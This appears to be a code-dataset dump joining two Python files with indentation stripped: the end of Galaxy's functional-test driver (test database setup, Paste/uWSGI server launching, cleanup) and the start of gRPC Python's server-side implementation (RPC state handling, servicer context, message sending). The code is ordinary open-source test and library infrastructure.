actual_database_parsed = database_template_parsed._replace(path="/%s" % actual_db)
database_connection = actual_database_parsed.geturl()
if not database_exists(database_connection):
# We pass by migrations and instantiate the current table
create_database(database_connection)
mapping.init('/tmp', database_connection, create_tables=True, map_install_models=True)
toolshed_mapping.init(database_connection, create_tables=True)
check_migrate_databases = False
else:
default_db_filename = "%s.sqlite" % prefix.lower()
template_var = "%s_TEST_DB_TEMPLATE" % prefix
db_path = os.path.join(db_path, default_db_filename)
if template_var in os.environ:
# Middle ground between recreating a completely new
# database and pointing at existing database with
# GALAXY_TEST_DBURI. The former requires a lot of setup
# time, the latter results in test failures in certain
# cases (namely tool shed tests expecting clean database).
copy_database_template(os.environ[template_var], db_path)
database_auto_migrate = True
database_connection = 'sqlite:///%s' % db_path
config = {
"check_migrate_databases": check_migrate_databases,
"database_connection": database_connection,
"database_auto_migrate": database_auto_migrate
}
if not database_connection.startswith("sqlite://"):
config["database_engine_option_max_overflow"] = "20"
config["database_engine_option_pool_size"] = "10"
if template_name:
config["database_template"] = template_name
return config
def install_database_conf(db_path, default_merged=False):
if 'GALAXY_TEST_INSTALL_DBURI' in os.environ:
install_galaxy_database_connection = os.environ['GALAXY_TEST_INSTALL_DBURI']
elif asbool(os.environ.get('GALAXY_TEST_INSTALL_DB_MERGED', default_merged)):
install_galaxy_database_connection = None
else:
install_galaxy_db_path = os.path.join(db_path, 'install.sqlite')
install_galaxy_database_connection = 'sqlite:///%s' % install_galaxy_db_path
conf = {}
if install_galaxy_database_connection is not None:
conf["install_database_connection"] = install_galaxy_database_connection
return conf
def database_files_path(test_tmpdir, prefix="GALAXY"):
"""Create a mock database/ directory like in GALAXY_ROOT.
Use prefix to default this if TOOL_SHED_TEST_DBPATH or
GALAXY_TEST_DBPATH is set in the environment.
"""
environ_var = "%s_TEST_DBPATH" % prefix
if environ_var in os.environ:
db_path = os.environ[environ_var]
else:
tempdir = tempfile.mkdtemp(dir=test_tmpdir)
db_path = os.path.join(tempdir, 'database')
return db_path
def _get_static_settings():
"""Configuration required for Galaxy static middleware.
Returns dictionary of the settings necessary for a galaxy App
to be wrapped in the static middleware.
This mainly consists of the filesystem locations of url-mapped
static resources.
"""
static_dir = os.path.join(galaxy_root, "static")
# TODO: these should be copied from config/galaxy.ini
return dict(
static_enabled=True,
static_cache_time=360,
static_dir=static_dir,
static_images_dir=os.path.join(static_dir, 'images', ''),
static_favicon_dir=os.path.join(static_dir, 'favicon.ico'),
static_scripts_dir=os.path.join(static_dir, 'scripts', ''),
static_style_dir=os.path.join(static_dir, 'style'),
static_robots_txt=os.path.join(static_dir, 'robots.txt'),
)
def get_webapp_global_conf():
"""Get the global_conf dictionary sent to ``app_factory``."""
# (was originally sent 'dict()') - nothing here for now except static settings
global_conf = dict()
global_conf.update(_get_static_settings())
return global_conf
def wait_for_http_server(host, port, sleep_amount=0.1, sleep_tries=150):
"""Wait for an HTTP server to boot up."""
# Test if the server is up
for _ in range(sleep_tries):
# directly test the app, not the proxy
conn = http_client.HTTPConnection(host, port)
try:
conn.request("GET", "/")
response = conn.getresponse()
if response.status == 200:
break
except OSError as e:
if e.errno not in [61, 111]:
raise
time.sleep(sleep_amount)
else:
template = "Test HTTP server on host %s and port %s did not return '200 OK' after 10 tries"
message = template % (host, port)
raise Exception(message)
def attempt_ports(port):
if port is not None:
yield port
raise Exception("An existing process seems bound to specified test server port [%s]" % port)
else:
random.seed()
for _ in range(0, 9):
port = str(random.randint(8000, 10000))
yield port
raise Exception("Unable to open a port between {} and {} to start Galaxy server".format(8000, 10000))
def serve_webapp(webapp, port=None, host=None):
"""Serve the webapp on a recommend port or a free one.
Return the port the webapp is running on.
"""
server = None
for port in attempt_ports(port):
try:
server = httpserver.serve(webapp, host=host, port=port, start_loop=False)
break
except OSError as e:
if e.errno == 98:
continue
raise
t = threading.Thread(target=server.serve_forever)
t.start()
return server, port
def cleanup_directory(tempdir):
"""Clean up temporary files used by test unless GALAXY_TEST_NO_CLEANUP is set.
Also respect TOOL_SHED_TEST_NO_CLEANUP for legacy reasons.
"""
skip_cleanup = "GALAXY_TEST_NO_CLEANUP" in os.environ or "TOOL_SHED_TEST_NO_CLEANUP" in os.environ
if skip_cleanup:
log.info("GALAXY_TEST_NO_CLEANUP is on. Temporary files in %s" % tempdir)
return
try:
if os.path.exists(tempdir) and not skip_cleanup:
shutil.rmtree(tempdir)
except Exception:
pass
def setup_shed_tools_for_test(app, tmpdir, testing_migrated_tools, testing_installed_tools):
"""Modify Galaxy app's toolbox for migrated or installed tool tests."""
if testing_installed_tools:
# TODO: Do this without modifying app - that is a pretty violation
# of Galaxy's abstraction - we shouldn't require app at all let alone
# be modifying it.
tool_configs = app.config.tool_configs
# Eliminate the migrated_tool_panel_config from the app's tool_configs, append the list of installed_tool_panel_configs,
# and reload the app's toolbox.
relative_migrated_tool_panel_config = os.path.join(app.config.root, MIGRATED_TOOL_PANEL_CONFIG)
if relative_migrated_tool_panel_config in tool_configs:
tool_configs.remove(relative_migrated_tool_panel_config)
for installed_tool_panel_config in INSTALLED_TOOL_PANEL_CONFIGS:
tool_configs.append(installed_tool_panel_config)
from galaxy import tools # delay import because this brings in so many modules for small tests # noqa: E402
app.toolbox = tools.ToolBox(tool_configs, app.config.tool_path, app)
def build_galaxy_app(simple_kwargs):
"""Build a Galaxy app object from a simple keyword arguments.
Construct paste style complex dictionary and use load_app_properties so
Galaxy override variables are respected. Also setup "global" references
to sqlalchemy database context for Galaxy and install databases.
"""
log.info("Galaxy database connection: %s", simple_kwargs["database_connection"])
simple_kwargs['global_conf'] = get_webapp_global_conf()
simple_kwargs['global_conf']['__file__'] = "lib/galaxy/config/sample/galaxy.yml.sample"
simple_kwargs = load_app_properties(
kwds=simple_kwargs
)
# Build the Universe Application
app = GalaxyUniverseApplication(**simple_kwargs)
log.info("Embedded Galaxy application started")
global galaxy_context
global install_context
galaxy_context = app.model.context
install_context = app.install_model.context
# Toolbox indexing happens via the work queue out of band recently, and,
# beyond potentially running async after tests execute doesn't execute
# without building a uwsgi app (app.is_webapp = False for this test kit).
# We need to ensure to build an index for the test galaxy app -- this is
# pretty fast with the limited toolset
app.reindex_tool_search()
return app
def build_shed_app(simple_kwargs):
"""Build a Galaxy app object from a simple keyword arguments.
Construct paste style complex dictionary. Also setup "global" reference
to sqlalchemy database context for tool shed database.
"""
log.info("Tool shed database connection: %s", simple_kwargs["database_connection"])
# TODO: Simplify global_conf to match Galaxy above...
simple_kwargs['__file__'] = 'tool_shed_wsgi.yml.sample'
simple_kwargs['global_conf'] = get_webapp_global_conf()
app = ToolshedUniverseApplication(**simple_kwargs)
log.info("Embedded Toolshed application started")
global tool_shed_context
tool_shed_context = app.model.context
return app
def explicitly_configured_host_and_port(prefix, config_object):
host_env_key = "%s_TEST_HOST" % prefix
port_env_key = "%s_TEST_PORT" % prefix
port_random_env_key = "%s_TEST_PORT_RANDOM" % prefix
default_web_host = getattr(config_object, "default_web_host", DEFAULT_WEB_HOST)
host = os.environ.get(host_env_key, default_web_host)
if os.environ.get(port_random_env_key, None) is not None:
# Ignore the port environment variable, it wasn't explictly configured.
port = None
else:
port = os.environ.get(port_env_key, None)
# If an explicit port wasn't assigned for this test or test case, set this
# environment variable so we know it is random. We can then randomly re-assign
# for new tests.
if port is None:
os.environ["GALAXY_TEST_PORT_RANDOM"] = "1"
return host, port
def set_and_wait_for_http_target(prefix, host, port, sleep_amount=0.1, sleep_tries=150):
host_env_key = "%s_TEST_HOST" % prefix
port_env_key = "%s_TEST_PORT" % prefix
os.environ[host_env_key] = host
os.environ[port_env_key] = port
wait_for_http_server(host, port, sleep_amount=sleep_amount, sleep_tries=sleep_tries)
class ServerWrapper:
def __init__(self, name, host, port):
self.name = name
self.host = host
self.port = port
@property
def app(self):
raise NotImplementedError("Test can be run against target - requires a Galaxy app object.")
def stop(self):
raise NotImplementedError()
class PasteServerWrapper(ServerWrapper):
def __init__(self, app, server, name, host, port):
super().__init__(name, host, port)
self._app = app
self._server = server
@property
def app(self):
return self._app
def stop(self):
if self._server is not None:
log.info("Shutting down embedded %s web server" % self.name)
self._server.server_close()
log.info("Embedded web server %s stopped" % self.name)
if self._app is not None:
log.info("Stopping application %s" % self.name)
self._app.shutdown()
log.info("Application %s stopped." % self.name)
class UwsgiServerWrapper(ServerWrapper):
def __init__(self, p, name, host, port):
super().__init__(name, host, port)
self._p = p
self._r = None
self._t = threading.Thread(target=self.wait)
self._t.start()
def __del__(self):
self._t.join()
def wait(self):
self._r = self._p.wait()
def stop(self):
try:
os.killpg(os.getpgid(self._p.pid), signal.SIGTERM)
except Exception:
pass
time.sleep(.1)
try:
os.killpg(os.getpgid(self._p.pid), signal.SIGKILL)
except Exception:
pass
self._t.join()
def launch_uwsgi(kwargs, tempdir, prefix=DEFAULT_CONFIG_PREFIX, config_object=None):
name = prefix.lower()
host, port = explicitly_configured_host_and_port(prefix, config_object)
config = {}
config["galaxy"] = kwargs.copy()
enable_realtime_mapping = getattr(config_object, "enable_realtime_mapping", False)
if enable_realtime_mapping:
interactive_tool_defaults = {
"interactivetools_prefix": "interactivetool",
"interactivetools_map": os.path.join(tempdir, "interactivetools_map.sqlite"),
"interactivetools_enable": True
}
for key, value in interactive_tool_defaults.items():
if key not in config["galaxy"]:
config["galaxy"][key] = value
yaml_config_path = os.path.join(tempdir, "galaxy.yml")
with open(yaml_config_path, "w") as f:
yaml.dump(config, f)
if enable_realtime_mapping:
# Avoid YAML.dump configuration since uwsgi doesn't like real YAML :( -
# though maybe it would work?
with open(yaml_config_path) as f:
old_contents = f.read()
with open(yaml_config_path, "w") as f:
test_port = str(port) if port else r"[0-9]+"
test_host = re.escape(host) if host else "localhost"
uwsgi_section = REALTIME_PROXY_TEMPLATE.safe_substitute(test_host=test_host, test_port=test_port, tempdir=tempdir)
f.write(uwsgi_section)
f.write(old_contents)
def attempt_port_bind(port):
uwsgi_command = [
"uwsgi",
"--http",
"{}:{}".format(host, port),
"--yaml",
yaml_config_path,
"--module",
"galaxy.webapps.galaxy.buildapp:uwsgi_app_factory()",
"--enable-threads",
"--die-on-term",
]
for p in sys.path:
uwsgi_command.append('--pythonpath')
uwsgi_command.append(p)
handle_uwsgi_cli_command = getattr(
config_object, "handle_uwsgi_cli_command", None
)
if handle_uwsgi_cli_command is not None:
handle_uwsgi_cli_command(uwsgi_command)
# we don't want to quote every argument but we don't want to print unquoted ones either, so do this
log.info("Starting uwsgi with command line: %s", ' '.join(shlex_quote(x) for x in uwsgi_command))
p = subprocess.Popen(
uwsgi_command,
cwd=galaxy_root,
preexec_fn=os.setsid,
)
return UwsgiServerWrapper(
p, name, host, port
)
for port in attempt_ports(port):
server_wrapper = attempt_port_bind(port)
try:
set_and_wait_for_http_target(prefix, host, port, sleep_tries=50)
log.info("Test-managed uwsgi web server for {} started at {}:{}".format(name, host, port))
return server_wrapper
except Exception:
server_wrapper.stop()
def launch_server(app, webapp_factory, kwargs, prefix=DEFAULT_CONFIG_PREFIX, config_object=None):
"""Launch a web server for a given app using supplied factory.
Consistently read either GALAXY_TEST_HOST and GALAXY_TEST_PORT or
TOOL_SHED_TEST_HOST and TOOL_SHED_TEST_PORT and ensure these are
all set after this method has been called.
"""
name = prefix.lower()
host, port = explicitly_configured_host_and_port(prefix, config_object)
webapp = webapp_factory(
kwargs['global_conf'],
app=app,
use_translogger=False,
static_enabled=True,
register_shutdown_at_exit=False
)
server, port = serve_webapp(
webapp,
host=host, port=port
)
set_and_wait_for_http_target(prefix, host, port)
log.info("Embedded paste web server for {} started at {}:{}".format(name, host, port))
return PasteServerWrapper(
app, server, name, host, port
)
class TestDriver:
"""Responsible for the life-cycle of a Galaxy-style functional test.
Sets up servers, configures tests, runs nose, and tears things
down. This is somewhat like a Python TestCase - but different
because it is meant to provide a main() endpoint.
"""
def __init__(self):
"""Setup tracked resources."""
self.server_wrappers = []
self.temp_directories = []
def setup(self):
"""Called before tests are built."""
def build_tests(self):
"""After environment is setup, setup nose tests."""
def tear_down(self):
"""Cleanup resources tracked by this object."""
self.stop_servers()
for temp_directory in self.temp_directories:
cleanup_directory(temp_directory)
def stop_servers(self):
for server_wrapper in self.server_wrappers:
server_wrapper.stop()
self.server_wrappers = []
def mkdtemp(self):
"""Return a temp directory that is properly cleaned up or not based on the config."""
temp_directory = tempfile.mkdtemp()
self.temp_directories.append(temp_directory)
return temp_directory
def run(self):
"""Driver whole test.
Setup environment, build tests (if needed), run test,
and finally cleanup resources.
"""
configure_environment()
self.setup()
self.build_tests()
try:
success = nose_config_and_run()
return 0 if success else 1
except Exception as e:
log.info("Failure running tests")
raise e
finally:
log.info("Shutting down")
self.tear_down()
class GalaxyTestDriver(TestDriver):
"""Instantial a Galaxy-style nose TestDriver for testing Galaxy."""
testing_shed_tools = False
def _configure(self, config_object=None):
"""Setup various variables used to launch a Galaxy server."""
config_object = self._ensure_config_object(config_object)
self.external_galaxy = os.environ.get('GALAXY_TEST_EXTERNAL', None)
# Allow a particular test to force uwsgi or any test to use uwsgi with
# the GALAXY_TEST_UWSGI environment variable.
use_uwsgi = os.environ.get('GALAXY_TEST_UWSGI', None)
if not use_uwsgi:
if getattr(config_object, "require_uwsgi", None):
use_uwsgi = True
self.use_uwsgi = use_uwsgi
# Allow controlling the log format
log_format = os.environ.get('GALAXY_TEST_LOG_FORMAT', None)
if not log_format and use_uwsgi:
log_format = "%(name)s %(levelname)-5.5s %(asctime)s " \
"[p:%(process)s,w:%(worker_id)s,m:%(mule_id)s] " \
"[%(threadName)s] %(message)s"
self.log_format = log_format
self.galaxy_test_tmp_dir = get_galaxy_test_tmp_dir()
self.temp_directories.append(self.galaxy_test_tmp_dir)
self.testing_shed_tools = getattr(config_object, "testing_shed_tools", False)
if getattr(config_object, "framework_tool_and_types", False):
default_tool_conf = FRAMEWORK_SAMPLE_TOOLS_CONF
datatypes_conf_override = FRAMEWORK_DATATYPES_CONF
else:
default_tool_conf = getattr(config_object, "default_tool_conf", None)
datatypes_conf_override = getattr(config_object, "datatypes_conf_override", None)
self.default_tool_conf = default_tool_conf
self.datatypes_conf_override = datatypes_conf_override
def setup(self, config_object=None):
"""Setup a Galaxy server for functional test (if needed).
Configuration options can be specified as attributes on the supplied
```config_object``` (defaults to self).
"""
self._saved_galaxy_config = None
self._configure(config_object)
self._register_and_run_servers(config_object)
def restart(self, config_object=None, handle_config=None):
self.stop_servers()
self._register_and_run_servers(config_object, handle_config=handle_config)
def _register_and_run_servers(self, config_object=None, handle_config=None):
config_object = self._ensure_config_object(config_object)
self.app = None
if self.external_galaxy is None:
if self._saved_galaxy_config is not None:
galaxy_config = self._saved_galaxy_config
else:
tempdir = tempfile.mkdtemp(dir=self.galaxy_test_tmp_dir)
# Configure the database path.
galaxy_db_path = database_files_path(tempdir)
# Allow config object to specify a config dict or a method to produce
# one - other just read the properties above and use the default
# implementation from this file.
galaxy_config = getattr(config_object, "galaxy_config", None)
if callable(galaxy_config):
galaxy_config = galaxy_config()
if galaxy_config is None:
setup_galaxy_config_kwds = dict(
use_test_file_dir=not self.testing_shed_tools,
default_install_db_merged=True,
default_tool_conf=self.default_tool_conf,
datatypes_conf=self.datatypes_conf_override,
prefer_template_database=getattr(config_object, "prefer_template_database", False),
log_format=self.log_format,
conda_auto_init=getattr(config_object, "conda_auto_init", False),
conda_auto_install=getattr(config_object, "conda_auto_install", False),
use_shared_connection_for_amqp=getattr(config_object, "use_shared_connection_for_amqp", False)
)
galaxy_config = setup_galaxy_config(
galaxy_db_path,
**setup_galaxy_config_kwds
)
isolate_galaxy_config = getattr(config_object, "isolate_galaxy_config", False)
if isolate_galaxy_config:
galaxy_config["config_dir"] = tempdir
self._saved_galaxy_config = galaxy_config
if galaxy_config is not None:
handle_galaxy_config_kwds = handle_config or getattr(
config_object, "handle_galaxy_config_kwds", None
)
if handle_galaxy_config_kwds is not None:
handle_galaxy_config_kwds(galaxy_config)
if self.use_uwsgi:
server_wrapper = launch_uwsgi(
galaxy_config,
tempdir=tempdir,
config_object=config_object,
)
else:
# ---- Build Application --------------------------------------------------
self.app = build_galaxy_app(galaxy_config)
server_wrapper = launch_server(
self.app,
buildapp.app_factory,
galaxy_config,
config_object=config_object,
)
log.info("Functional tests will be run against external Galaxy server {}:{}".format(server_wrapper.host, server_wrapper.port))
self.server_wrappers.append(server_wrapper)
else:
log.info("Functional tests will be run against test managed Galaxy server %s" % self.external_galaxy)
# Ensure test file directory setup even though galaxy config isn't built.
ensure_test_file_dir_set()
def _ensure_config_object(self, config_object):
if config_object is None:
config_object = self
return config_object
def setup_shed_tools(self, testing_migrated_tools=False, testing_installed_tools=True):
setup_shed_tools_for_test(
self.app,
self.galaxy_test_tmp_dir,
testing_migrated_tools,
testing_installed_tools
)
def build_tool_tests(self, testing_shed_tools=None, return_test_classes=False):
if self.app is None:
return
if testing_shed_tools is None:
testing_shed_tools = getattr(self, "testing_shed_tools", False)
# We must make sure that functional.test_toolbox is always imported after
# database_contexts.galaxy_content is set (which occurs in this method above).
# If functional.test_toolbox is imported before database_contexts.galaxy_content
# is set, sa_session will be None in all methods that use it.
import functional.test_toolbox
functional.test_toolbox.toolbox = self.app.toolbox
# When testing data managers, do not test toolbox.
test_classes = functional.test_toolbox.build_tests(
app=self.app,
testing_shed_tools=testing_shed_tools,
master_api_key=get_master_api_key(),
user_api_key=get_user_api_key(),
)
if return_test_classes:
return test_classes
return functional.test_toolbox
def run_tool_test(self, tool_id, index=0, resource_parameters=None, **kwd):
if resource_parameters is None:
resource_parameters = {}
host, port, url = target_url_parts()
galaxy_interactor_kwds = {
"galaxy_url": url,
"master_api_key": get_master_api_key(),
"api_key": get_user_api_key(),
"keep_outputs_dir": None,
}
galaxy_interactor = GalaxyInteractorApi(**galaxy_interactor_kwds)
verify_tool(
tool_id=tool_id,
test_index=index,
galaxy_interactor=galaxy_interactor,
resource_parameters=resource_parameters,
**kwd
)
def drive_test(test_driver_class):
"""Instantiate driver class, run, and exit appropriately."""
test_driver = test_driver_class()
sys.exit(test_driver.run())
__all__ = (
"copy_database_template",
"build_logger",
"drive_test",
"FRAMEWORK_UPLOAD_TOOL_CONF",
"FRAMEWORK_SAMPLE_TOOLS_CONF",
"FRAMEWORK_DATATYPES_CONF",
"database_conf",
"get_webapp_global_conf",
"nose_config_and_run",
"setup_galaxy_config",
"TestDriver",
"wait_for_http_server",
)
|
_server.py | # Copyright 2016 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Service-side implementation of gRPC Python."""
import collections
import enum
import logging
import threading
import time
from concurrent import futures
import six
import grpc
from grpc import _common
from grpc import _interceptor
from grpc._cython import cygrpc
_LOGGER = logging.getLogger(__name__)
_SHUTDOWN_TAG = 'shutdown'
_REQUEST_CALL_TAG = 'request_call'
_RECEIVE_CLOSE_ON_SERVER_TOKEN = 'receive_close_on_server'
_SEND_INITIAL_METADATA_TOKEN = 'send_initial_metadata'
_RECEIVE_MESSAGE_TOKEN = 'receive_message'
_SEND_MESSAGE_TOKEN = 'send_message'
_SEND_INITIAL_METADATA_AND_SEND_MESSAGE_TOKEN = (
'send_initial_metadata * send_message')
_SEND_STATUS_FROM_SERVER_TOKEN = 'send_status_from_server'
_SEND_INITIAL_METADATA_AND_SEND_STATUS_FROM_SERVER_TOKEN = (
'send_initial_metadata * send_status_from_server')
_OPEN = 'open'
_CLOSED = 'closed'
_CANCELLED = 'cancelled'
_EMPTY_FLAGS = 0
_DEALLOCATED_SERVER_CHECK_PERIOD_S = 1.0
def _serialized_request(request_event):
return request_event.batch_operations[0].message()
def _application_code(code):
cygrpc_code = _common.STATUS_CODE_TO_CYGRPC_STATUS_CODE.get(code)
return cygrpc.StatusCode.unknown if cygrpc_code is None else cygrpc_code
def _completion_code(state):
if state.code is None:
return cygrpc.StatusCode.ok
else:
return _application_code(state.code)
def _abortion_code(state, code):
if state.code is None:
return code
else:
return _application_code(state.code)
def _details(state):
return b'' if state.details is None else state.details
class _HandlerCallDetails(
collections.namedtuple('_HandlerCallDetails', (
'method',
'invocation_metadata',
)), grpc.HandlerCallDetails):
pass
class _RPCState(object):
def __init__(self):
self.condition = threading.Condition()
self.due = set()
self.request = None
self.client = _OPEN
self.initial_metadata_allowed = True
self.disable_next_compression = False
self.trailing_metadata = None
self.code = None
self.details = None
self.statused = False
self.rpc_errors = []
self.callbacks = []
self.aborted = False
def _raise_rpc_error(state):
rpc_error = grpc.RpcError()
state.rpc_errors.append(rpc_error)
raise rpc_error
def _possibly_finish_call(state, token):
state.due.remove(token)
if not _is_rpc_state_active(state) and not state.due:
callbacks = state.callbacks
state.callbacks = None
return state, callbacks
else:
return None, ()
def _send_status_from_server(state, token):
def send_status_from_server(unused_send_status_from_server_event):
with state.condition:
return _possibly_finish_call(state, token)
return send_status_from_server
def _abort(state, call, code, details):
if state.client is not _CANCELLED:
effective_code = _abortion_code(state, code)
effective_details = details if state.details is None else state.details
if state.initial_metadata_allowed:
operations = (
cygrpc.SendInitialMetadataOperation(None, _EMPTY_FLAGS),
cygrpc.SendStatusFromServerOperation(
state.trailing_metadata, effective_code, effective_details,
_EMPTY_FLAGS),
)
token = _SEND_INITIAL_METADATA_AND_SEND_STATUS_FROM_SERVER_TOKEN
else:
operations = (cygrpc.SendStatusFromServerOperation(
state.trailing_metadata, effective_code, effective_details,
_EMPTY_FLAGS),)
token = _SEND_STATUS_FROM_SERVER_TOKEN
call.start_server_batch(operations,
_send_status_from_server(state, token))
state.statused = True
state.due.add(token)
def _receive_close_on_server(state):
def receive_close_on_server(receive_close_on_server_event):
with state.condition:
if receive_close_on_server_event.batch_operations[0].cancelled():
state.client = _CANCELLED
elif state.client is _OPEN:
state.client = _CLOSED
state.condition.notify_all()
return _possibly_finish_call(state, _RECEIVE_CLOSE_ON_SERVER_TOKEN)
return receive_close_on_server
def _receive_message(state, call, request_deserializer):
def receive_message(receive_message_event):
serialized_request = _serialized_request(receive_message_event)
if serialized_request is None:
with state.condition:
if state.client is _OPEN:
state.client = _CLOSED
state.condition.notify_all()
return _possibly_finish_call(state, _RECEIVE_MESSAGE_TOKEN)
else:
request = _common.deserialize(serialized_request,
request_deserializer)
with state.condition:
if request is None:
_abort(state, call, cygrpc.StatusCode.internal,
b'Exception deserializing request!')
else:
state.request = request
state.condition.notify_all()
return _possibly_finish_call(state, _RECEIVE_MESSAGE_TOKEN)
return receive_message
def _send_initial_metadata(state):
def send_initial_metadata(unused_send_initial_metadata_event):
with state.condition:
return _possibly_finish_call(state, _SEND_INITIAL_METADATA_TOKEN)
return send_initial_metadata
def _send_message(state, token):
def send_message(unused_send_message_event):
with state.condition:
state.condition.notify_all()
return _possibly_finish_call(state, token)
return send_message
class _Context(grpc.ServicerContext):
def __init__(self, rpc_event, state, request_deserializer):
self._rpc_event = rpc_event
self._state = state
self._request_deserializer = request_deserializer
def is_active(self):
with self._state.condition:
return _is_rpc_state_active(self._state)
def time_remaining(self):
return max(self._rpc_event.call_details.deadline - time.time(), 0)
def cancel(self):
self._rpc_event.call.cancel()
def add_callback(self, callback):
with self._state.condition:
if self._state.callbacks is None:
return False
else:
self._state.callbacks.append(callback)
return True
def disable_next_message_compression(self):
with self._state.condition:
self._state.disable_next_compression = True
def invocation_metadata(self):
return self._rpc_event.invocation_metadata
def peer(self):
return _common.decode(self._rpc_event.call.peer())
def peer_identities(self):
return cygrpc.peer_identities(self._rpc_event.call)
def peer_identity_key(self):
id_key = cygrpc.peer_identity_key(self._rpc_event.call)
return id_key if id_key is None else _common.decode(id_key)
def auth_context(self):
return {
_common.decode(key): value
for key, value in six.iteritems(
cygrpc.auth_context(self._rpc_event.call))
}
def send_initial_metadata(self, initial_metadata):
with self._state.condition:
if self._state.client is _CANCELLED:
_raise_rpc_error(self._state)
else:
if self._state.initial_metadata_allowed:
operation = cygrpc.SendInitialMetadataOperation(
initial_metadata, _EMPTY_FLAGS)
self._rpc_event.call.start_server_batch(
(operation,), _send_initial_metadata(self._state))
self._state.initial_metadata_allowed = False
self._state.due.add(_SEND_INITIAL_METADATA_TOKEN)
else:
raise ValueError('Initial metadata no longer allowed!')
def set_trailing_metadata(self, trailing_metadata):
with self._state.condition:
self._state.trailing_metadata = trailing_metadata
def abort(self, code, details):
# treat OK like other invalid arguments: fail the RPC
if code == grpc.StatusCode.OK:
_LOGGER.error(
'abort() called with StatusCode.OK; returning UNKNOWN')
code = grpc.StatusCode.UNKNOWN
details = ''
with self._state.condition:
self._state.code = code
self._state.details = _common.encode(details)
self._state.aborted = True
raise Exception()
def abort_with_status(self, status):
self._state.trailing_metadata = status.trailing_metadata
self.abort(status.code, status.details)
def set_code(self, code):
with self._state.condition:
self._state.code = code
def set_details(self, details):
with self._state.condition:
self._state.details = _common.encode(details)
def _finalize_state(self):
pass
class _RequestIterator(object):
def __init__(self, state, call, request_deserializer):
self._state = state
self._call = call
self._request_deserializer = request_deserializer
def _raise_or_start_receive_message(self):
if self._state.client is _CANCELLED:
_raise_rpc_error(self._state)
elif not _is_rpc_state_active(self._state):
raise StopIteration()
else:
self._call.start_server_batch(
(cygrpc.ReceiveMessageOperation(_EMPTY_FLAGS),),
_receive_message(self._state, self._call,
self._request_deserializer))
self._state.due.add(_RECEIVE_MESSAGE_TOKEN)
def _look_for_request(self):
if self._state.client is _CANCELLED:
_raise_rpc_error(self._state)
elif (self._state.request is None and
_RECEIVE_MESSAGE_TOKEN not in self._state.due):
raise StopIteration()
else:
request = self._state.request
self._state.request = None
return request
raise AssertionError() # should never run
def _next(self):
with self._state.condition:
self._raise_or_start_receive_message()
while True:
self._state.condition.wait()
request = self._look_for_request()
if request is not None:
return request
def __iter__(self):
return self
def __next__(self):
return self._next()
def next(self):
return self._next()
def _unary_request(rpc_event, state, request_deserializer):
def unary_request():
with state.condition:
if not _is_rpc_state_active(state):
return None
else:
rpc_event.call.start_server_batch(
(cygrpc.ReceiveMessageOperation(_EMPTY_FLAGS),),
_receive_message(state, rpc_event.call,
request_deserializer))
state.due.add(_RECEIVE_MESSAGE_TOKEN)
while True:
state.condition.wait()
if state.request is None:
if state.client is _CLOSED:
details = '"{}" requires exactly one request message.'.format(
rpc_event.call_details.method)
_abort(state, rpc_event.call,
cygrpc.StatusCode.unimplemented,
_common.encode(details))
return None
elif state.client is _CANCELLED:
return None
else:
request = state.request
state.request = None
return request
return unary_request
def _call_behavior(rpc_event,
state,
behavior,
argument,
request_deserializer,
send_response_callback=None):
from grpc import _create_servicer_context
with _create_servicer_context(rpc_event, state,
request_deserializer) as context:
try:
if send_response_callback is not None:
return behavior(argument, context, send_response_callback), True
else:
return behavior(argument, context), True
except Exception as exception: # pylint: disable=broad-except
with state.condition:
if state.aborted:
_abort(state, rpc_event.call, cygrpc.StatusCode.unknown,
b'RPC Aborted')
elif exception not in state.rpc_errors:
details = 'Exception calling application: {}'.format(
exception)
_LOGGER.exception(details)
_abort(state, rpc_event.call, cygrpc.StatusCode.unknown,
_common.encode(details))
return None, False
def _take_response_from_response_iterator(rpc_event, state, response_iterator):
try:
return next(response_iterator), True
except StopIteration:
return None, True
except Exception as exception: # pylint: disable=broad-except
with state.condition:
if state.aborted:
_abort(state, rpc_event.call, cygrpc.StatusCode.unknown,
b'RPC Aborted')
elif exception not in state.rpc_errors:
details = 'Exception iterating responses: {}'.format(exception)
_LOGGER.exception(details)
_abort(state, rpc_event.call, cygrpc.StatusCode.unknown,
_common.encode(details))
return None, False
def _serialize_response(rpc_event, state, response, response_serializer):
serialized_response = _common.serialize(response, response_serializer)
if serialized_response is None:
with state.condition:
_abort(state, rpc_event.call, cygrpc.StatusCode.internal,
b'Failed to serialize response!')
return None
else:
return serialized_response
def _send_response(rpc_event, state, serialized_response):
with state.condition:
if not _is_rpc_state_active(state):
return False
else:
if state.initial_metadata_allowed:
operations = (
cygrpc.SendInitialMetadataOperation(None, _EMPTY_FLAGS),
cygrpc.SendMessageOperation(serialized_response,
_EMPTY_FLAGS),
)
state.initial_metadata_allowed = False
token = _SEND_INITIAL_METADATA_AND_SEND_MESSAGE_TOKEN
else:
operations = (cygrpc.SendMessageOperation(
serialized_response, _EMPTY_FLAGS),)
token = _SEND_MESSAGE_TOKEN
rpc_event.call.start_server_batch(operations,
_send_message(state, token))
state.due.add(token)
while True:
state.condition.wait()
if token not in state.due:
return _is_rpc_state_active(state)
def _status(rpc_event, state, serialized_response):
with state.condition:
if state.client is not _CANCELLED:
code = _completion_code(state)
details = _details(state)
operations = [
cygrpc.SendStatusFromServerOperation(
state.trailing_metadata, code, details, _EMPTY_FLAGS),
]
if state.initial_metadata_allowed:
operations.append(
cygrpc.SendInitialMetadataOperation(None, _EMPTY_FLAGS))
if serialized_response is not None:
operations.append(
cygrpc.SendMessageOperation(serialized_response,
_EMPTY_FLAGS))
rpc_event.call.start_server_batch(
operations,
_send_status_from_server(state, _SEND_STATUS_FROM_SERVER_TOKEN))
state.statused = True
state.due.add(_SEND_STATUS_FROM_SERVER_TOKEN)
def _unary_response_in_pool(rpc_event, state, behavior, argument_thunk,
request_deserializer, response_serializer):
cygrpc.install_context_from_request_call_event(rpc_event)
try:
argument = argument_thunk()
if argument is not None:
response, proceed = _call_behavior(rpc_event, state, behavior,
argument, request_deserializer)
if proceed:
serialized_response = _serialize_response(
rpc_event, state, response, response_serializer)
if serialized_response is not None:
_status(rpc_event, state, serialized_response)
finally:
cygrpc.uninstall_context()
